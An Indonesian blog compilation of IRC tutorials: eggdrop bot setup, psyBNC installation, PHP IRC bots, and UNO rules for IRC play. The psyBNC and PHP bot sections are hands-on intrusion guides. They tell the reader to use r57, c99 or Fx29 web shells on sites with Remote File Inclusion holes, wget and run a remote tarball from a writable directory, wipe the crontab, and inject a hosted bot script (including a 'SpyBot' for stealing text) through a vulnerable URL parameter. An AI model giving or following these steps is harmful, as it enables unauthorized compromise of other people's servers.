Yang dibutuhkan adalah SHELL, sebaiknya gunakan SHELL legal bisa dibeli di beberapa company irc hosting Indonesia yang melayani (cari di google aja yah :) )? setelah itu siapkan config, trus persiapkan TCL apa yang diinginkan. Misalnya ingin membuat Bot Game ya siapkan TCL Game, dan seterusnya. Nah setelah punya SHELL (yang legal, nyolong dosa tauuu !!!), siapkan putty (bisa download ke alamat..klik aja tuh kata putty nya). Gunakan Secure SHell protocol atau lebih sering disingkat SSH untuk login ke SHELL.
Selanjutnya download eggdrop1.6.19.tar.gz dari eggheads ftp trus telnet dan FTP ke SHELL. Lamgkah berikutnya adalah:

Upload eggdrop1.6.19.tar.gz via FTP, ketik tar -zxvf eggdrop1.6.19.tar.qz untuk extract filenya.
Kalau udah terextract masuk ke direktorinya dengan mengetik cd eggdrop ketik ./configure

Ketik make config (untuk compile semua modul) atau make iconfig (compile hanya modul yang dipilih)

Ketik make trus ketik lagi make install DEST=/home/name/botdir

Trusss edit config bot sesuai keterangan yg ada dalam filenya.

Cari file dengan nama eggdrop.conf, kemudian edit untuk edit bisa gunakan perintah for example, pico/nano/vi eggdrop.conf (pilih salah satu).

Kalo udah mengedit simpan file eggdrop tadi kemudian jalankan bot dengan perintah:

/eggdrop -m eggdrop.conf (nama config file)

Selanjutnya tinggal masukkan or nambahin TCL deh..

Untuk lengkapnya mengenai tutorial ini bisa dibaca di egghelp (udah lengkap banget bahkan ada TCL juga disitu). Cuma ya� kebanyakan pada males baca kesitu.. in english sih, tipe-tipe orang Indonesia kebanyakan udah males kalo liat tutorialnya in english (he he he).

Sumber: http://kill-nines.blogspot.com

Tutor membuat PsyBnc Injekan

mungkin anda mendapatkan target RFI dengan SAFE MODE OFF. Kenapa yg OFF? Karena fungsi-fungsi system, exec, passhthru, dan popen untuk mengeksekusi perintah shell ini aktif secara default. Nah, bagaimana cara Anda mengeksekusi perintah tsb? Yaitu dengan menggunakan injector seperti r57, c99, atau Fx29. Disana kita akan menemukan input box untuk mengetikkan perintah2 shell, biasanya berlabel “Command”, “Run Command”, “Execute Command”, atau semacam itu. Baiklah.. Langsung aja ya..

Pertama kita harus berada di direktori yg full permission, ewh.. Apa itu full permission? Yaitu direktori/folder yg mengizinkan kita utk menulis/meletakkan file didalamnya. Masih bingung? Ya udah, kita langsung aja coba direktori yg biasanya full perm/writable diantaranya /var/tmp/, /var/spool/samba/.

Disini kita menggunakan injector Fx29Sh, untuk pindah ke direktori /var/tmp/ kita tinggal mengetikkannya di input box berlabel “Directory” dan klik tombol “GO”. Skr kita udah berada di direktori /var/tmp/, lalu ketikkan perintah2 dibawah ini di Input yg berlabel “Command”.

1. wget http://channels.dal.net/nama/psy.tar.gz
2. tar -zvxf psy.tar.gz

3. cd .psy

4. ./config

contoh: ./config ANASKI 1990
ident = ANASKI
port = 1990

5. ./fuck
perintah ini akan menghapus semua crontab dan membuat crontab baru untuk psyBNC, hati-hatilah menggunakannya

6. ./run
perintah ini akan menjalankan psyBNC, set ident di mIRC sesuai diatas lalu koneklah melalui port yg telah di set pada langkah 4 diatas.

Jika muncul baris dengan pesan “Listening on port 1991?, berarti psyBNC-nya udah jalan. Kemudian kita tes koneksinya di mIRC dengan mengetikkan:

/server
Contoh: /server 127.0.0.1 ANASKI

Jika berhasil, akan muncul pesan “Welcome to psyBNC” di mIRC eloe dan ingat.. Ident/username yg pertama konek adalah admin psyBNC tsb dan password untuk konek ke psyBNC td adalah “passgue”. Untuk konek ke IRC, ketik /addserver irc.cbn.net.id:6667 dan tunggulah sampai psyBNC kita terhubung ke server IRC.

Minggu, 07 Februari 2010

Cara Membuat Bot PHP

Cara Membuat Bot PHP

Tutorial ini dibuat karena banyaknya pertanyaan di IRC tentang bagaimana cara membuat BOT PHP. BOT PHP adalah script PHP yang dibuat untuk melakukan koneksi ke IRC. Script ini dijalankan pada server yang mendukung PHP. PHP adalah salah satu jenis bahasa pemrograman web yang bersifat server side. Info tentang PHP dapat kita cari di google.

Adapun yang kita perlukan utk membuat Bot PHP adalah:

1. Situs target dengan bug RFI, yaitu situs yang memiliki celah Remote File Inclusion. Scan di : irc.rosebanditz.org, irc.mildnet.org, irc.kamtiez.us. Joinlah ke channel2 yang bot scanner nya atau , kadang2 kita jg ketemu bot yg sedang scan. jika bug dork nya benar maka target nya keluar, tergantung bug yg sedang di scanning.kunci nya harus rajin scanner dan sabar..

2. Script Bot PHP, --> Script BotPHP

1. BotPHP (Bot untuk meramaikan channel saja)

2. BotPing (Bot yang dapat berbicara di channel dan Bot yang bisa berbagai macam informasi tentang server target dan beberapa fitur lainnya seperti Ping, Version, Astro, Port Checker, DNS, dll)

3. SpyBot (Bot untuk melakukan mata2 dan pencurian terhadap teks tertentu) <-- bot yg q suka :D soal nya bisa spy target heheh Setelah dapat script nya, anda tinggal ganti admin, password, dan channel.

3. Situs untuk mengupload/menyimpan script bot yang sudah kita edit, beberapa situs yg bisa kita gunakan adalah geocities, ripway, dan fileave.com. Sekarang kita masuk ke langkah berikutnya …. Anggap saja kita mendapatkan target seperti ini ->; http://target.com/vurn.php?bug= dan script yg sudah kita edit tadi di upload ke geocities atau yg lainya dg link seperti ini -> http://geocities.com/cracker/botphp.txt , jadi kita tinggal membuka target dg browser dg cara -> http://target.com/vurn.php?bug=http://geocities.com/cracker/botphp.txt?

Jika browser tidak akan menampilkan apa-apa setelah kita membuka link tsb, maka kemungkinan botnya akan join ke channel kita dan tunggulah sampai botnya join ke IRC. Jika botnya tidak join, berarti ada beberapa faktor yg menyebabkan botnya ga join (seperti diblok firewall, di ban dari server IRC, kline, dll). Jika browser menampilkan situs asli, maka cobalah target berikutnya :D

Cara membuat bot perl

Cara penggunaan c99 atau r57

Sabtu, 30 Januari 2010

Cara Bermain Uno

Cara Bermain UNO

 

Banyak yang tidak mengetahui cara bermain UNO, padahal sebenarnya bermain UNO itu sangat mudah. Dan bila seseorang sudah mengetahui caranya biasanya orang tersebut akan ketagihan (additected) untuk bermain UNO. Permainan UNO sendiri dimainkan oleh minimal dua orang atau lebih. Makin banyak yang bermain, pastinya permainan akan semakin menarik.

 

Pada dasarnya permainan UNO hanya menyamakan angka atau menyamakan warna dengan kartu yang terakhir dibuang oleh pemain terakhir. Pemenang UNO adalah yang pemain pertama menghabiskan kartu yang ada ditangannya. Pada awal permainan setiap pemain akan diberi 7 buah kartu secara acak. Ada 4 warna yang dimainkan yaitu:



  • Green (hijau) dari angka 1 hingga 9


  • Blue (biru) dari angka 1 hingga 9


  • Red (merah) dari angka 1 hingga 9


  • Yellow (kuning) dari angka 1 hingga 9

CARA BERMAIN DI IRC:

 

Untuk mengikuti sebuah game uno, hanya tinggal mengetikkan: jo di channel untuk dibagikan 7 buah kartu. Perhatikan terus permainan, amati setiap kartu yang terakhir dibagikan. misalnya: si_A mainkan [ Green 8 ] ke si_B (berarti selanjutnya adalah giliran si_B)

 

Misalnya kartu terakhir yang dibuang adalah [ Green 8 ] maka kita hanya dapat mengeluarkan kartu yang berwarna hijau (Green) atau kartu yang mempunyai nilai 8. Untuk mengeluarkan kartu dapat dilakukan dengan mengetikan: pl (kartunya) di channel. misalnya bila kita ingin mengeluarkan kartu [ Yellow 8 ] maka kita cukup mengetikkan: pl Y8. atau bila kita ingin menyamakan warna dengan kartu [ Green 6 ] maka kita cukup mengetikkan: pl G6.

 

Apabila ternyata kita tidak mempunyai kartu terakhir yaitu [ Green 8 ]  maka kita harus mengambil kartu dari kocokan dengan cara mengetik: dr. Kemudian kartu yang kita ambil kita samakan lagi dengan kartu terakhir. Apabila ternyata kartunya berwarna hijau atau mempunyai nilai 8 dapat dikeluarkan dengan mengetikkan: pl (kartunya). Akan tetapi apabila setelah mengambil dari kocokan dan tetap tidak mendapatkan kartu yang sama maka harus mengetikkan: pa (pass)

 

Selain kartu angka, terdapat 3 kartu lainnya yaitu REVERSE, SKIP, dan DRAW TWO.



  • Kartu Reserve berguna untuk mengubah arah putaran pemain. misalnya semula arah permainan dari si_A, si_B, si_C dan si_D maka bila si_D mengeluarkan kartu REVERSE maka putaran berubah menjadi si_D, si_C, si_B dan si_A.


  • Kartu Skip berguna untuk melewat giliran pemain selanjutnya setelah giliran pemain yang mengeluarkan skip. misalnya permainan diikuti dengan giliran secara berurutan: si_A, si_B, si_C dan si_D, maka bila si_A mengeluarkan kartu SKIP maka giliran si_B akan dilewati dan selanjutnya yang jalan adalah si_C.


  • Kartu Draw Two berguna untuk membuat pemain selanjutnya mengambil 2 kartu dari kocokan. bila si_A mengeluarkan kartu DRAW TWO maka si_B harus mengambil 2 kartu kan selanjutnya yang jalan adalah si_C.

Selain kartu yang berwarna merah, hijau, biru dan kuning, terdapat kartu joker yaitu [ WILD ] dan [WILDDRAWFOUR]. Keunggulan kartu ini adalah, kartu ini dapat dikeluarkan kapan pun tidak perlu menyamakan dengan kartu sebelumnya. setelah mengeluarkan kartu joker ini, maka pemain harus memilih warna selanjutnya. Misalnya, bila memilih warna selanjutnya hijau maka dapat mengetik: co G. Untuk kartu [WILDDRAWFOUR] maka pemain selanjutnya harus mengambil 4 kartu dari kocokan dan giliran dia dilewat. Misalnya permainan diikuti dengan giliran secara berurutan: si_A, si_B, si_C dan si_D, maka bila si_A mengeluarkan kartu [WILDDRAWFOUR] maka si_B harus mengambil 4 kartu, kemudian si_A memilih warna dan selanjutnya yang jalan adalah si_C sesuai dengan warna yang dipilih si_A.

 

 

LIST PERINTAH

List Perintah yang dipakai:



  • jo = join (untuk mengikuti permainan)


  • pl = play yaitu untuk menjalankan kartu (example : pl g 3 = kita memainkan kartu hijau angka 3)


  • dr = drew yaitu mengambil kartu dari kocokan apabila kita tidak mempunyai kartu yang diminta


  • pa = pass yaitu memberikan giliran kepada pemain selanjutnya karena kita tidak memiliki kartu.


  • cd = melihat kartu yang terakhir turun 


  • ca = melihat kartu yang ada di tangan kita


  • st = melihat jumlah kartu seluruh pemain


  • tu = melihat kartu seluruh pemain dan urutannya


  • od = melihat urutan permainan


  • ti = melihat waktu permainan


  • !unotop10 = untuk melihat ranking


  • !unowon = melihat poin kita

 

yg Enak sambil scan target :D :D